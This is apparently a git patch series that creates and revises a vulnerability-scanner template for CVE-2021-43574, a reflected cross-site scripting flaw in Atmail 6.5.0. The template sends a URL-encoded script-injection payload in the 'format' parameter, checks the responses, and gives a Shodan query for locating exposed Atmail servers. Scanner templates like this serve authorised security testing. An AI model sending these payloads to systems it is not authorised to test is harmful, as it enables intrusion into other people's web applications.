From 3f072e5f2e9c759d51aba1bf8f0dee718dda0dec Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Thu, 1 Sep 2022 11:46:54 +0530 Subject: [PATCH 1/3] Create CVE-2021-43574.yaml --- cves/2021/CVE-2021-43574.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-43574.yaml diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml new file mode 100644 index 0000000000..ff24496a8a --- /dev/null +++ b/cves/2021/CVE-2021-43574.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-43574 + +info: + name: Atmail Hosting Webserver 6.5.0 - Reflected Cross-site scripting + author: arafatansari + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43574 + - https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e + metadata: + shodan-query: http.html:"Powered by Atmail" + verified: true + tags: xss,cve,2021 + +requests: + - raw: + - | + GET /atmail/?format="> HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + words: + - '' From fe8ce97ceb18ab46d5dc6c3853399d007ff24585 Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Thu, 1 Sep 2022 11:54:02 +0530 Subject: [PATCH 2/3] Update CVE-2021-43574.yaml --- cves/2021/CVE-2021-43574.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml index ff24496a8a..746617c5d9 100644 --- a/cves/2021/CVE-2021-43574.yaml +++ b/cves/2021/CVE-2021-43574.yaml @@ -19,6 +19,14 @@ requests: - | GET /atmail/?format="> HTTP/1.1 Host: {{Hostname}} + + - | + GET /atmail/webmail/?format="> HTTP/1.1 + Host: {{Hostname}} + + - | + GET /?format="> HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: From 99702fea47d023f266bc8bf574f7db8e944de0ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Sep 2022 12:04:48 +0530 Subject: [PATCH 3/3] Update CVE-2021-43574.yaml --- cves/2021/CVE-2021-43574.yaml | 46 +++++++++++++++++++---------------- 1 file changed, 25 insertions(+), 21 deletions(-) diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml index 746617c5d9..e6fcbe06b9 100644 --- a/cves/2021/CVE-2021-43574.yaml +++ b/cves/2021/CVE-2021-43574.yaml @@ -1,39 +1,43 @@ id: CVE-2021-43574 info: - name: Atmail Hosting Webserver 6.5.0 - Reflected Cross-site scripting - author: arafatansari + name: Atmail Hosting Webserver 6.5.0 - Cross-site scripting + author: arafatansari,ritikchaddha severity: medium description: | Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43574 - https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e + - https://nvd.nist.gov/vuln/detail/CVE-2021-43574 + classification: + cve-id: CVE-2021-43574 metadata: - shodan-query: http.html:"Powered by Atmail" verified: true - tags: xss,cve,2021 + shodan-query: http.html:"Powered by Atmail" + tags: cve,cve2021,atmail,xss requests: - - raw: - - | - GET /atmail/?format="> HTTP/1.1 - Host: {{Hostname}} - - - | - GET /atmail/webmail/?format="> HTTP/1.1 - Host: {{Hostname}} - - - | - GET /?format="> HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + stop-at-first-match: true matchers-condition: and matchers: + - type: word + part: body + words: + - '" does not exist' + + - type: word + part: header + words: + - text/html + - type: status status: - 500 - - - type: word - words: - - '' + - 403 + condition: or